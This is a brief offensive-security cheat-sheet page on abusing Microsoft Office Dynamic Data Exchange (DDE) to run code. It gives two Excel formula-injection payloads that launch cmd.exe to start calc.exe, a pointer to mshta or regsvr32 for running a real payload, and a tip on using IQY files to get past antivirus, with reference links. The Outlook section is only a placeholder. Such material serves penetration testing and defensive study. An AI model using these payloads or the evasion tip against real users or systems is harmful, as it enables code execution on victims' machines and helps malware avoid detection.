Navigation :

Office DDE

DDE, or Dynamic Data Exchange, allows one program to subscribe to items made available by another program, for example a cell in a Microsoft Excel spreadsheet, and be notified whenever that item changes. This can be used to execute code on interactive target.

Excel

=CMD|'/C calc.exe'!A0
=MSEXCEL|'\..\..\..\Windows\System32\cmd.exe /c calc.exe'!A0

See mshta or regsvr32 to execute a real payload.

Tip

Usage of an IQY file can help bypass AV solution:

http://www.labofapenetrationtester.com/2015/08/abusing-web-query-iqy-files.html
https://www.bleepingcomputer.com/news/security/malspam-campaigns-using-iqy-attachments-to-bypass-av-filters-and-install-rats/

Outlook

Did not try yet, check https://www.securitysift.com/abusing-microsoft-office-dde/